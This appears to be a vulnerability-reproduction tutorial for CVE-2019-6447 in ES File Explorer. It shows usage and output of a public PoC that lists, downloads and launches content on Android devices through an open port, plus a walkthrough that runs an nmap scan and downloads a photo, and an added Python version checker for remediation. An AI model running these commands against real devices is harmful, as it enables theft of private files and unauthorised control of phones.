[Vulnerability Reproduction] ES File Explorer Open Port Vulnerability - CVE-2019-6447

Vulnerability description

On affected versions of ES File Explorer, port 59777/tcp is opened as an HTTP server. An attacker only needs to craft a malicious JSON request to download files from the victim's device and launch applications. The vulnerability can also be used to carry out man-in-the-middle (MITM) attacks.

Affected versions

4.1.9.7.4 and below

POC URL

https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

How to use the POC

Before running the POC, install the following three modules:

requests
pylint
autopep8


They can be installed with pip3. Usage examples of the POC:

$ python poc.py -g /sdcard/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg

$ python poc.py --cmd appPull --pkg com.tencent.mm

$ python poc.py --cmd getAppThumbnail --pkg com.tencent.mm

$ python poc.py --cmd appLaunch --pkg com.tencent.mm
{"result":"0"}

$ python poc.py --cmd getDeviceInfo
{"name":"Nexus 6P", "ftpRoot":"/sdcard", "ftpPort":"3721"}

$ python poc.py --cmd listAppsAll
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"},
{"packageName":"com.android.cts.priv.ctsshim", "label":"com.android.cts.priv.ctsshim", "version":"8.1.0-4396705", "versionCode":"27", "location":"/system/priv-app/CtsShimPrivPrebuilt/CtsShimPrivPrebuilt.apk", "size":"22744", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsPhone
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsSystem
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listApps
{"packageName":"com.google.android.youtube", "label":"YouTube", "version":"13.50.52", "versionCode":"1350523400", "location":"/data/app/com.google.android.youtube-hg9X1FaylPbUXO1SaiFtkg==/base.apk", "size":"36860368", "status":"com.google.android.apps.youtube.app.application.backup.YouTubeBackupAgent", "mTime":"1545337705957"}

$ python poc.py --cmd listAppsSdcard

$ python poc.py --cmd listAudios
{"name":"hangouts_incoming_call.ogg", "time":"10/17/18 11:33:16 PM", "location":"/storage/emulated/0/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg", "duration":5000, "size":"74.63 KB (76,425 Bytes)", }

$ python poc.py --cmd listPics
{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }

$ python poc.py --cmd listVideos

$ python poc.py --cmd listFiles

$ python poc.py --cmd listFiles --network 192.168.1.

$ python poc.py list

######################
# Available Commands #
######################

listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the system apps
listAppsPhone: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info
appPull: Pull an app from the device. Package name parameter is needed
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed
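For remediation, the affected range (4.1.9.7.4 and below) has to be checked against the inventory of installed apps. The following is an added example, not part of the original post or the POC: it parses listApps-style JSON records (one object per line, in the format shown above), compares the dotted version string against the advisory threshold, and reports affected installs. The package name com.estrongs.android.pop and the sample records are assumptions/constructed for the example.

```python
import json

# Affected versions per the advisory: 4.1.9.7.4 and below.
AFFECTED_MAX = (4, 1, 9, 7, 4)
# Package name of ES File Explorer (assumption: not stated in the post).
ES_PACKAGE = "com.estrongs.android.pop"

# Constructed listApps-style records collected from several devices (not real output).
SAMPLE_LISTAPPS = """
{"packageName":"com.google.android.youtube", "label":"YouTube", "version":"13.50.52", "versionCode":"1350523400"},
{"packageName":"com.estrongs.android.pop", "label":"ES File Explorer", "version":"4.1.9.7.4", "versionCode":"100"},
{"packageName":"com.estrongs.android.pop", "label":"ES File Explorer", "version":"4.1.9.9", "versionCode":"101"}
"""


def parse_version(ver: str) -> tuple:
    """Turn a dotted version such as "4.1.9.7.4" into a tuple of ints.

    A non-numeric suffix such as the "-4396705" in "8.1.0-4396705" ends
    parsing of that segment; anything after it is ignored.
    """
    parts = []
    for seg in ver.split("."):
        digits = ""
        for ch in seg:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_affected(ver: str) -> bool:
    """True when ver is 4.1.9.7.4 or lower.

    Tuple comparison treats a shorter prefix as older, so "4.1.9.7"
    (released before 4.1.9.7.4) is affected and "4.1.9.7.5" is not.
    """
    v = parse_version(ver)
    return bool(v) and v <= AFFECTED_MAX


def find_vulnerable_es(records_text: str) -> list:
    """Return [(label, version)] for affected ES File Explorer installs.

    records_text holds one JSON object per line; a trailing comma between
    objects (as in the listAppsAll output) is stripped before parsing.
    """
    hits = []
    for line in records_text.splitlines():
        line = line.strip().rstrip(",")
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("packageName") == ES_PACKAGE and is_affected(rec.get("version", "")):
            hits.append((rec.get("label"), rec["version"]))
    return hits
```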

Exploitation walkthrough

First, install an affected version of ES File Explorer on an Android device.

Use nmap to check whether port 59777 is open:

sudo nmap -sS -p 59777 -v 192.168.0.100

Once the target has the port open, use the POC to verify that the vulnerability is present:

python3 poc.py --cmd getDeviceInfo --network 192.168.0.


Running getDeviceInfo shows the device's system information.

PACT00 is your phone model.

Next, use listPics to list the paths of the pictures on the phone.

There are many; pick one at random and download it with -g.

The path argument after -g must be taken from the information just retrieved.

Then enter the following path:

python3 poc.py -g /sdcard/Tencent/QQ_Images/-1915ed44cc2d41ae.jpg


This image is

After downloading, the file is saved in the current directory.
